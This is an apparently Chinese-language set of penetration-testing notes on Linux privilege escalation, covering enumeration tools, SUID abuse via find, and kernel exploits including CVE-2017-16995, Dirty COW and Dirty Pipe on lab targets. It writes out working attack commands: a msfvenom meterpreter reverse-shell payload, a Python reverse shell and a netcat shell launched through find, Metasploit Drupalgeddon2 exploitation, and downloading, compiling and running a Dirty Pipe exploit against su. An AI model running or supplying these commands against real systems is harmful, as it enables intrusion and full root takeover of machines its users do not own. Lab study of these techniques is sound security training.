【权限提升】Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID

一些漏洞扫描项目&探针&提权命令查询

综合类探针：

GitHub - liamg/traitor: :arrow_up: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock

自动化提权：

GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / Mac

信息收集：

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

GitHub - sleventyeleven/linuxprivchecker: linuxprivchecker.py -- a Linux Privilege Escalation Check Script

漏洞探针：

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester

二进制文件提权命令查询平台：

Linux：GTFOBins

Windows：LOLBAS

配置安全SUID提权-探针&利用-云服务器

漏洞成因：chmod u+s给予了suid u-s删除了suid 使程序在运行中受到了suid root权限的执行过程导致

提权过程：探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

手工命令探针安全：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

脚本项目探针安全：

LinEnum.sh traitor linuxprivchecker 检测可能存在SUID利用

参考利用：

GTFOBins

SUID Executables – Penetration Testing Lab 提供可用命令参数 是否能给我们提供提权途径

Nmap Vim find Bash More Less Nano cp

这里利用find命令 管理员为了文件查找的结果更多，赋予了fin查找程序suid root权限

并且 find命令可以使用参数与其他命令进行结合使用

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.146 LPORT=4444 -f elf > mshell.elf use exploit/multi/handler #使用监听模块 set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload 哥斯拉运行mshell.elf后门 上线

touch whgojp
find whgojp -exec whoami \;

利用NC反弹：注：linux下nc版本默认低版本 没有-e参数

find whgojp -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

利用Python反弹：linux自带python环境

find whgojp -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.146",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
nc -lvp 7777

使用nc监听7777端口

成功使用suid提权至root权限

内核漏洞本地用户提权-探针&利用-Mozhe

提权过程：连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG

探针项目：BeRoot linux-exploit-suggester linux-exploit-suggester2

ssh连接本地低权限用户

上传漏洞探针脚本，赋予执行权限

$ ./les.sh

$ ./linux-exploit-suggester-2.pl

cve-2017-16995漏洞利用

gcc cve-2017-16995 -o cve-2017-16995 chmod +x cve-2017-16995 ./cve-2017-16995 id

内核漏洞Web用户提权-探针&利用-脏牛dcow

脏牛vulhub靶机 百度云盘

nmap 扫描到靶机地址以及对应开放服务 根据页面识别为Drupal框架

nmap 10.10.10.0/24 nmap -p1-65535 10.10.10.148

使用msf进行溢出利用

search drupal use exploit/unix/webapp/drupal_drupalgeddon2 set rhost 10.10.10.148 set rport 1898 run

内核提权整个过程：（linux-exploit-suggester获取信息哦）

vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG

上传les.sh 进行漏洞探测

内核漏洞提权过：寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)

当然其中也包括了脏牛漏洞以及漏洞利用exp

upload /root/dcow.cpp /tmp/dcow.cpp cd /tmp g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil ./dcow su root

成功拿到靶机

内核漏洞本地用户提权-探针&利用-DirtyPipe

Dirty Pipe(CVE-2022-0847) 5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

wget https://haxx.in/files/dirtypipez.c --no-check-certificate
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su  #任何具体suid权限的文件均可
id